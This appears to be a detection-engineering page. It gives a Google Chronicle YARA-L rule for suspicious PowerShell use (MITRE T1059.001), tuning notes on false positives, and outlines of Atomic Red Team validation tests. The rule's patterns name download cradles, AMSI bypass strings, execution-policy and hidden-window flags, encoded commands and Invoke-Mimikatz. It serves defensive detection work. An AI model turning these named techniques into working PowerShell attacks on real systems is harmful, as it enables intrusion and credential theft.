Detect PowerShell in Google Chronicle
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. PowerShell can also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
MITRE ATT&CK
- Tactic
- Execution
- Technique
- T1059 Command and Scripting Interpreter
- Sub-technique
- T1059.001 PowerShell
- Canonical reference
- https://attack.mitre.org/techniques/T1059/001/
YARA-L Detection Query
rule t1059_001_powershell_suspicious_execution {
meta:
author = "Argus Detection Engineering"
description = "Detects suspicious PowerShell execution indicative of MITRE ATT&CK T1059.001 — PowerShell abuse for execution, download cradles, AMSI bypass, and encoded commands."
severity = "HIGH"
priority = "HIGH"
mitre_attack_tactic = "Execution"
mitre_attack_technique = "T1059.001"
reference = "https://attack.mitre.org/techniques/T1059/001/"
version = "1.0"
events:
$e.metadata.event_type = "PROCESS_LAUNCH"
(
$e.target.process.file.full_path = /(?i)\\(powershell|pwsh)\.exe$/ or
$e.target.process.file.full_path = /(?i)\/(powershell|pwsh)$/
)
(
$e.target.process.command_line = /(?i)-encodedcommand/ or
$e.target.process.command_line = /(?i)-enc\s/ or
$e.target.process.command_line = /(?i)-ec\s/ or
$e.target.process.command_line = /(?i)invoke-webrequest/ or
$e.target.process.command_line = /(?i)iwr\s/ or
$e.target.process.command_line = /(?i)invoke-restmethod/ or
$e.target.process.command_line = /(?i)net\.webclient/ or
$e.target.process.command_line = /(?i)downloadstring/ or
$e.target.process.command_line = /(?i)downloadfile/ or
$e.target.process.command_line = /(?i)downloaddata/ or
$e.target.process.command_line = /(?i)start-bitstransfer/ or
$e.target.process.command_line = /(?i)amsiutils/ or
$e.target.process.command_line = /(?i)amsiinitfailed/ or
$e.target.process.command_line = /(?i)setprotectionlevel/ or
$e.target.process.command_line = /(?i)-executionpolicy\s+bypass/ or
$e.target.process.command_line = /(?i)-ep\s+bypass/ or
$e.target.process.command_line = /(?i)-ep\s+unrestricted/ or
$e.target.process.command_line = /(?i)-windowstyle\s+hidden/ or
$e.target.process.command_line = /(?i)-w\s+hidden/ or
$e.target.process.command_line = /(?i)invoke-expression/ or
$e.target.process.command_line = /(?i)iex\(/ or
$e.target.process.command_line = /(?i)frombase64string/ or
$e.target.process.command_line = /(?i)invoke-mimikatz/ or
$e.target.process.command_line = /(?i)invoke-shellcode/ or
$e.target.process.command_line = /(?i)io\.compression/
)
condition:
$e
}Google Chronicle YARA-L 2.0 rule detecting suspicious PowerShell execution via UDM PROCESS_LAUNCH events. Matches powershell.exe and pwsh.exe process launches with command lines containing encoded command flags, download cradles, AMSI bypass strings, execution policy overrides, hidden window flags, and known offensive PowerShell tool invocations.
Data Sources
Required Tables
False Positives & Tuning
- Enterprise software deployment tools (SCCM, Intune MDM) that execute PowerShell with -EncodedCommand as part of application installation or configuration enforcement
- Legitimate administrative scripts used by help desk or SysAdmin teams that download tooling from internal shares using Net.WebClient or Invoke-WebRequest
- Backup and monitoring agents (e.g., Veeam, SolarWinds) running PowerShell with hidden windows and download capabilities during scheduled maintenance tasks
Other platforms for T1059.001
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Encoded Command Execution
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. Security Event ID 4688 (if command line auditing enabled) with same details. PowerShell ScriptBlock Log Event ID 4104 will show the decoded content 'whoami'.
- Test 2Download Cradle via Net.WebClient
Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network Connection to 127.0.0.1:8080. PowerShell ScriptBlock Log Event ID 4104 with full script content. The connection will fail (no listener) but the process creation event still fires.
- Test 3AMSI Bypass via Reflection
Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing 'AmsiUtils' and 'amsiInitFailed'. PowerShell ScriptBlock Log Event ID 4104 with the reflection code. Windows Defender Event ID 1116 (AMSI detection) in Microsoft-Windows-Windows Defender/Operational log.
- Test 4Execution Policy Bypass with Hidden Window
Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing '-ExecutionPolicy Bypass' and '-WindowStyle Hidden'. File creation event (Sysmon Event ID 11) for the temp file. PowerShell ScriptBlock Log Event ID 4104.
References (8)
- https://attack.mitre.org/techniques/T1059/001/
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://docs.splunk.com/Documentation/SplunkCloud/latest/SearchReference/CommonStatsFunctions
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell
- https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion
- https://s3cur3th1ssh1t.github.io/Powershell-and-the-NET-AMSI-Interface/
Unlock Pro Content
Get the full detection package for T1059.001 including response playbook, investigation guide, and atomic red team tests.